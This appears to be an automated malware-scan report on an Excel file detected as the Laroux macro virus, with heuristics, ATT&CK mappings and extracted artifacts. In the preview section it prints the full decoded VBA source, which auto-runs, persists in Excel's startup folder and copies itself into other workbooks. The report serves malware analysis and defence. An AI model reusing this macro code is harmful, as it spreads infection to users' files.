MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-21. It contains an Auto_Open VBA macro that executes automatically upon opening the Excel file. This macro attempts to save the workbook as 'jokefile.xls' in the startup path and re-registers itself to run again, indicating a persistence mechanism.
Heuristics 6
-
ClamAV: Xls.Trojan.Laroux-21 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Laroux-21
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 19,130 bytes but its declared streams total only 0 bytes — 19,130 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3196 bytes |
SHA-256: 845bb9d88b030998270ce8f23e169c3462bdc6a3ae48ef767c16e18d69b7c2f2 |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-21
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jokefile"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "joke"
End Sub
Sub joke()
Attribute joke.VB_ProcData.VB_Invoke_Func = " \n14"
C$ = Application.StartupPath
m$ = Dir(C$ & "\" & "jokefile.xls")
If m$ = "jokefile.xls" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
n4$ = ActiveWorkbook.Name
' Sheets("jokefile").Visible = True
Sheets("jokefile").Select
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
'ActiveWindow.Visible = False
Workbooks(newname$).SaveAs filename:=Application.StartupPath & "\" & "jokefile.xls", FileFormat:=xlNormal
ChDir c4$
Application.OnSheetActivate = ""
Application.OnSheetActivate = "jokefile!joke"
Case 1
'application.
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "jokefile" Then
Workbooks("jokefile.xls").Sheets("jokefile").Copy before:=Workbooks(n4$).Sheets(1)
Else
End If
Application.OnSheetActivate = ""
Application.OnSheetActivate = "jokefile.xls!joke"
Case Else
End Select
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
embedded_office_off00006746.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x6746 | 19130 bytes |
SHA-256: 60772d850187a91ea816d6910df03c9f226b1b3dbd71d29bdd1ba065da1e3310 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.